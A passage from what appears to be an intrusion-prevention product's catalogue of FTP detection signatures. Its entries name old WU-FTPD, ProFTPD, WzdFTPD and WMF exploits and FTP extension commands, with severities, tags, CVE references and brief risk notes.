Description: CVE References: CVE-1999-0368
Back to top

FTP_CS-WU-FTPD-Palmetto-BOF-Wh0a

About this situation: Palmetto Buffer Overflow against WU-FTPD and ProFTPD on Linux x86 (wh0a.c)
Context: FTP Client Stream
Severity: 10
Tags: Any Operating System, x86, WU-FTPD, ProFTPD, CVE1999, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Palmetto-BOF
Description: CVE References: CVE-1999-0368
Back to top

FTP_CS-WU-FTPD-Palmetto-BOF-Wu30

About this situation: Palmetto Buffer Overflow against WU-FTPD on SCO Unix (wu30.c)
Context: FTP Client Stream
Severity: 10
Tags: Any Operating System, x86, WU-FTPD, ProFTPD, CVE1999, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Palmetto-BOF
Description: CVE References: CVE-1999-0368
Back to top

FTP_CS-WU-FTPD-ProFTPD-Palmetto-BOF

About this situation: Palmetto Buffer Overflow against WU-FTPD and ProFTPD (wu-ftpd.pl)
Context: FTP Client Stream
Severity: 10
Tags: Unix, x86, WU-FTPD, ProFTPD, CVE1999, Unix not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Palmetto-BOF
Description: CVE References: CVE-1999-0368
Back to top

FTP_CS-WU-FTPD-Realpath-Off-By-One-BOF-BSD

About this situation: WU-FTPD realpath() off-by-one vulnerability on BSD
Context: FTP Client Stream
Severity: 10
Tags: BSD, Any Hardware, WU-FTPD, CVE2003, BSD not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: WU-FTPD-Realpath-Off-By-One-BOF
Description: CVE References: CVE-2003-0466
Back to top

FTP_CS-WU-FTPD-Realpath-Off-By-One-BOF-Linux

About this situation: WU-FTPD realpath() off-by-one vulnerability on Linux
Context: FTP Client Stream
Severity: 10
Tags: Linux, Any Hardware, WU-FTPD, CVE2003, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: WU-FTPD-Realpath-Off-By-One-BOF
Description: CVE References: CVE-2003-0466
Back to top

FTP_CS-WU-FTPD-Site-Exec-Sh

About this situation: WU-FTPD Site Exec vulnerability exploit
Context: FTP Client Stream
Severity: 7
Tags: Unix, Any Hardware, WU-FTPD, CVE1999, Unix not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: FTP-WU-FTPD-Site-Exec
Description:
Back to top

FTP_CS-WU-FTPD-Site-Newer-Command-Execution

About this situation: Possible denial of service attack against WU-FTPD with the SITE NEWER command
Context: FTP Client Stream
Severity: 2
Tags: SCO, Linux, Any Hardware, WU-FTPD, CVE1999, Linux not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-WU-FTPD-Site-Newer-Command-Execution
Description:
Back to top

FTP_CS-WU-FTPD-Use-Compress

About this situation: WU-FTPD use compress
Context: FTP Client Stream
Severity: 7
Tags: Linux, x86, WU-FTPD, CVE1999, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-WU-FTPD-Use-Compress
Description:
Back to top

FTP_CS-WzdFTPD-Site-Command-Remote-Command-Execution

About this situation: Remote shell command execution exploit against WzdFTPD
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WzdFTPD, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-249-3038
Vulnerability: WzdFTPD-Site-Command-Remote-Command-Execution
Description:
Back to top

FTP_CS-XLink-FTP-Server-Buffer-Overflow

About this situation: XLink FTP Server bundled with Omni NFS Server 5.2 Buffer Overflow
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, XLink Omni, CVE2006, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-648-5211
Vulnerability: XLink-FTP-Server-Buffer-Overflow
Description:
Back to top

FTP_CS-XM-Easy-Personal-FTP-Server-Nlst-DoS

About this situation: An attempt to exploit an XM Easy Personal FTP Server Nlst DoS vulnerability detected.
Context: FTP Client Stream
Severity: 2
Tags: Windows, Any Hardware, XM Easy Personal FTP Server, CVE2008, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-729-5211
Last changed: sgpkg-ips-732-5211
Vulnerability: XM-Easy-Personal-FTP-Server-Nlst-DoS
Description:
Back to top

FTP_DI-Gnu-Wget-FTP-Remote-File-Creation

About this situation: An attempt to exploit a vulnerability in GNU wget prior to 1.16 wget detected
Context: FTP Directory Listing Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wget, CVE2014, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Gnu-Wget-FTP-Remote-File-Creation
Description:
Back to top

FTP_DI-Php-FTP_genlist-Method-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: FTP Directory Listing Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-655-5211
Vulnerability: Php-FTP_genlist-Method-Integer-Overflow
Description:
Back to top

FTP_DL-Executable-File-Download

About this situation: Executable file detected
Context: FTP Download Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-215-2032
Last changed: sgpkg-ips-1406-5242
Vulnerability: Executable-File-Transfer
File-Type-Identification
Description:
Back to top

FTP_DL-WMF-Metasploit-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution

About this situation: Detects malicious Metasploit-made WMF files
Context: FTP Download Stream
Severity: 7
Tags: Windows, x86, MS2006-01, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-52-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
Description:
Back to top

FTP_DL-WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution

About this situation: Detects malicious WMF files
Context: FTP Download Stream
Severity: 7
Tags: Windows, x86, MS2006-01, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-51-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
Description:
Back to top

FTP_Download-RETR-Command

About this situation: FTP client gave RETR command
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: The FTP client tried to download a file using the FTP RETR command. This a normal action on most FTP servers. The defined security policy may forbid downloading a file on some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_Download-RETR-Command-Success

About this situation: FTP server did not send error reply when FTP client gave RETR command
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The FTP client tried to download a file using the FTP RETR command. This a normal action on most FTP servers. The defined security policy may forbid downloading a file on some FTP connections. This event was generated because the server did not give an error reply when the FTP client gave a file download command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_ENC

About this situation: FTP ENC command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The FTP ENC command was given. ENC is one of the FTP security extension commands [RFC 2228]. It is used to send a privacy protected command to the server. ENC is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using ENC in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_ENC-Argument-Too-Long-Success

About this situation: FTP ENC command with too long argument not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP ENC command that used too long an argument. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_ENC-Success

About this situation: FTP ENC command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP ENC command was not refused by the server. ENC is one of the FTP security extension commands [RFC 2228]. It is used to send a privacy protected command to the server. ENC is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using ENC in some FTP connections. This event was generated because the server did not give an error reply to an ENC command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_EPRT

About this situation: FTP EPRT command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The FTP EPRT command was given. The EPRT command is an FTP extension [RFC 2428]. It is used to give the server the destination port for opening a data connection. In contrast to PORT, it is possible to use EPRT in IPv6 networks in addition to IPv4 networks. EPRT is a normal FTP command on systems where both the client and the server support the extensions of [RFC 2428]. The defined policy may forbid using EPRT in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_EPRT-Argument-Too-Long-Success

About this situation: FTP EPRT command with too long argument not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP EPRT command that used too long an argument. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_EPRT-Success

About this situation: FTP EPRT command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP EPRT command was not refused by the server. The EPRT command is an FTP extension [RFC 2428]. It is used to give the server the destination port for opening a data connection. In contrast to PORT, it is possible to use EPRT in IPv6 networks in addition to IPv4 networks. EPRT is a normal FTP command on systems where both the client and the server support the extensions of [RFC 2428]. The defined policy may forbid using EPRT in some FTP connections. This event was generated because the server did not give an error reply to an EPRT command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_EPSV

About this situation: FTP EPSV command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The FTP EPSV command was given. The EPSV command is an FTP extension [RFC 2428]. It is used to make the server specify a port number where the data connection can be opened. In contrast to PASV, it is possible to use EPSV in IPv6 networks in addition to IPv4 networks. EPSV is a normal FTP command on systems where both the client and the server support the extensions of [RFC 2428]. The defined policy may forbid using EPSV in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_EPSV-Success

About this situation: FTP EPSV command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: An FTP EPSV command was not refused by the server. The EPSV command is an FTP extension [RFC 2428]. It is used to make the server specify a port number where the data connection can be opened. In contrast to PASV, it is possible to use EPSV in IPv6 networks in addition to IPv4 networks. EPSV is a normal FTP command on systems where both the client and the server support the extensions of [RFC 2428]. The defined policy may forbid using EPSV in some FTP connections. This event was generated because the server did not give an error reply to an EPSV command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_EPSV-Too-Big

About this situation: FTP EPSV argument too large
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The FTP EPSV command numerical argument is too large. This event was generated because the server did not give an error reply to the invalid command. Risk analysis: Risk level is fairly low.
Back to top

FTP_EPSV-Too-Big-Success

About this situation: Too large FTP EPSV argument not rejected by the server
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The FTP client gave an EPSV command with too large a numerical argument. This event was generated because the server did not give an error reply to the invalid command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Error-Internal

About this situation: Internal error in FTP inspection module
Context: FTP without parameters
Severity: 2
Tags: Inspection
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An internal error occurred in the FTP inspection module. The internal state of the FTP inspection module is inconsistent. This is a software fault that should not occur in normal operation. Risk analysis: Risk level is medium. The error can affect the Sensor node's detection capability and stability. Most relevant log fields: "Source file" and "Source file line" show where in the software the error was detected.
Back to top

FTP_ESTA

About this situation: FTP ESTA command given
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The FTP ESTA command was given. The ESTA command is a non-standard FTP extension, which is intended to prevent a race condition in the open data connection. ESTA is usually not implemented in FTP clients or servers. The defined policy may forbid using ESTA in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_ESTA-Success

About this situation: FTP ESTA command not refused by server
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP ESTA command was not refused by the server. The ESTA command is a non-standard FTP extension, which is intended to prevent a race condition in the open data connection. ESTA is usually not implemented in FTP clients or servers. The defined policy may forbid using ESTA in some FTP connections. This event was generated because the server did not give an error reply to an ESTA command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_ESTP

About this situation: FTP ESTP command given
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The FTP ESTP command was given. The ESTP command is a non-standard FTP extension, which is intended to prevent a race condition in the open data connection. ESTP is usually not implemented in FTP clients or servers. The defined policy may forbid using ESTP in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_ESTP-Argument-Too-Long-Success

About this situation: FTP ESTP with too long argument command not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP ESTP command that used too long an argument. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_ESTP-Success

About this situation: FTP ESTP command not refused by server
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP ESTP command was not refused by the server. The ESTP command is a non-standard FTP extension, which is intended to prevent a race condition in the open data connection. ESTP is usually not implemented in FTP clients or servers. The defined policy may forbid using ESTP in some FTP connections. This event was generated because the server did not give an error reply to an ESTP command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_FEAT

About this situation: FTP FEAT command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The FTP FEAT command was given. The FEAT command is an FTP extension [RFC 2389]. It is used to find out which optional commands the server supports. FEAT is a normal FTP command on systems where both the client and the server support the extensions of [RFC 2389]. The defined policy may forbid using FEAT in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_FEAT-Success

About this situation: FTP FEAT command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: An FTP FEAT command was not refused by the server. The FEAT command is an FTP extension [RFC 2389]. It is used to find out which optional commands the server supports. FEAT is a normal FTP command on systems where both the client and the server support the extensions of [RFC 2389]. The defined policy may forbid using FEAT in some FTP connections. This event was generated because the server did not give an error reply to a FEAT command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Feature-Unimplemented

About this situation: FTP client tried to use unimplemeneted feature
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The FTP client tried to use an FTP feature that is not supported by the FTP inspection module. Risk analysis: Risk level is fairly low. The subsequent protocol analysis will not be as detailed as it normally is if the server accepts the command.
Back to top

FTP_Feature-Unimplemented-Success

About this situation: FTP server did not refuse command with unimplemented feature
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The FTP server did not refuse a command with an FTP feature that is not supported by the FTP inspection module. Usually, these features are rarely implemented or obsolete. Risk analysis: Risk varies between low and medium. This event does not indicate a protocol violation but that the subsequent protocol analysis will not be as detailed as it normally is.
Back to top

FTP_HELP-Argument-Too-Long-Success

About this situation: FTP HELP command with too long argument not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP HELP command that used too long an argument. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_HOST

About this situation: FTP HOST command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1629-5242
Last changed: sgpkg-ips-1629-5242
Description: HOST is an FTP command used for differentiating multiple DNS names registered for a single IP address. This situation triggers if the domain name used in the HOST command is considered valid. The domain name can contain 2-100 times one of the following characters: 0-9, a-z, A-Z, ., :, -, and _. Risk analysis: Risk level is low.
Back to top

FTP_HOST-Invalid

About this situation: FTP HOST command has invalid characters
Context: FTP without parameters
Severity: 1
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-1629-5242
Last changed: sgpkg-ips-1629-5242
Description: HOST is an FTP command used for differentiating multiple DNS names registered for a single IP address. This situation triggers if the domain name used in the HOST command has invalid characters. The domain name can contain 2-100 times one of the following characters: 0-9, a-z, A-Z, ., :, -, and _. Risk analysis: Risk level is low.
Back to top

FTP_HOST-Success

About this situation: FTP HOST command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1629-5242
Last changed: sgpkg-ips-1629-5242
Description: An FTP HOST command was not refused by the server. HOST is an FTP command used for differentiating multiple DNS names registered for a single IP address. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_LANG

About this situation: FTP LANG command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The FTP LANG command was given. LANG is one of the FTP internationalization extensions [RFC 2640]. It is used to set the language of the textual parts of the server replies. LANG is a normal FTP command on systems where both the client and the server support the internationalization extensions. The defined policy may forbid using LANG in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_LANG-Argument-Too-Long-Success

About this situation: FTP LANG command with too long argument not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP LANG command that used too long an argument. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_LANG-Success

About this situation: FTP LANG command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP LANG command was not refused by the server. LANG is one of the FTP internationalization extensions [RFC 2640]. It is used to set the language of the textual parts of the server replies. LANG is a normal FTP command on systems where both the client and the server support the internationalization extensions. The defined policy may forbid using LANG in some FTP connections. This event was generated because the server did not give an error reply to a LANG command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_LF-As-CRLF

About this situation: Ftp client use LF where CRLF is required
Context: FTP Lone LF As CRLF
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: FTP client used LF instead of CRLF as the end-of-line marker. This is a protocol violation that is often seen when someone impersonates an FTP client or sometimes within attacks. It must be noted that this violation does not constitute itself an atttack, but is seen within attacks. Risk analysis: Risk varies between low and medium.
Back to top

FTP_LPRT

About this situation: FTP LPRT command given
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The FTP LPRT command was given. LPRT is an FTP extension [RFC 1639]. It is used to specify a port where the server should open a data connection. In contrast to PORT, LPRT can be used with some transport protocols other than IPv4. Normally the extensions in [RFC 2428] should be used instead of those in [RFC 1639]. The defined policy may forbid using LPRT in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_LPRT-Argument-Too-Long-Success

About this situation: FTP LPRT command with too long argument not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP LPRT command that used too long an argument. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_LPRT-Success

About this situation: FTP LPRT command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP LPRT command was not refused by the server. LPRT is an FTP extension [RFC 1639]. It is used to specify a port where the server should open a data connection. In contrast to PORT, LPRT can be used with some transport protocols other than IPv4. Normally the extensions in [RFC 2428] should be used instead of those in [RFC 1639]. The defined policy may forbid using LPRT in some FTP connections. This event was generated because the server did not give an error reply to an LPRT command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_LPSV

About this situation: FTP LPSV command given
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP LPSV command was given. LPSV is an FTP extension [RFC 1639]. It is used to request the server to specify the port where the client can open a data connection. In contrast to PASV, LPSV can be used with some transport protocols other than IPv4. Normally the extensions in [RFC 2428] should be used instead of those in [RFC 1639]. The defined policy may forbid using LPSV in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_LPSV-Success

About this situation: FTP LPSV command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP LPSV command was not refused by the server. LPSV is an FTP extension [RFC 1639]. It is used to request the server to specify the port where the client can open a data connection. In contrast to PASV, LPSV can be used with some transport protocols other than IPv4. Normally the extensions in [RFC 2428] should be used instead of those in [RFC 1639]. The defined policy may forbid using LPSV in some FTP connections. This event was generated because the server did not give an error reply to an LPSV command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_MDTM

About this situation: FTP MDTM command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: MDTM is an FTP extension defined in an Internet-Draft. It is used to retrieve the file modification time in a standard format. MDTM is a normal FTP command on systems where both the client and the server support this extension. The defined policy may forbid using MDTM in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_MDTM-Success

About this situation: FTP MDTM command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: An FTP MDTM command was not refused by the server. MDTM is an FTP extension defined in an Internet-Draft. It is used to retrieve the file modification time in a standard format. MDTM is a normal FTP command on systems where both the client and the server support this extension. The defined policy may forbid using MDTM in some FTP connections. This event was generated because the server did not give an error reply to an MDTM command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_MIC

About this situation: FTP MIC command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP MIC command was given. MIC is one of the FTP security extension commands [RFC 2228]. It is used to send an integrity-protected command to the server. MIC is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using MIC in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_MIC-Argument-Too-Long-Success

About this situation: FTP MIC command with too long argument not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP MIC command that used too long an argument. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_MIC-Success

About this situation: FTP MIC command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP MIC command was not refused by the server. MIC is one of the FTP security extension commands [RFC 2228]. It is used to send an integrity-protected command to the server. MIC is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using MIC in some FTP connections. This event was generated because the server did not give an error reply to a MIC command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_MLSD

About this situation: FTP MLSD command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: The FTP MLSD command was given. MLSD is an FTP extension defined in an Internet-Draft. It is used to retrieve a directory listing in a standard format. MLSD is a normal FTP command on systems where both the client and the server support this extension. The defined policy may forbid using MLSD in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_MLSD-Success

About this situation: FTP MLSD command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: An FTP MLSD command was not refused by the server. MLSD is an FTP extension defined in an Internet-Draft. It is used to retrieve a directory listing in a standard format. MLSD is a normal FTP command on systems where both the client and the server support this extension. The defined policy may forbid using MLSD in some FTP connections. This event was generated because the server did not give an error reply to an MLSD command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_MLST

About this situation: FTP MLST command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The FTP MLST command was given. MLST is an FTP extension defined in an Internet-Draft. It is used to retrieve the file or directory information in a standard format. MLST is a normal FTP command on systems where both the client and the server support this extension. The defined policy may forbid using MLST in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_MLST-Success

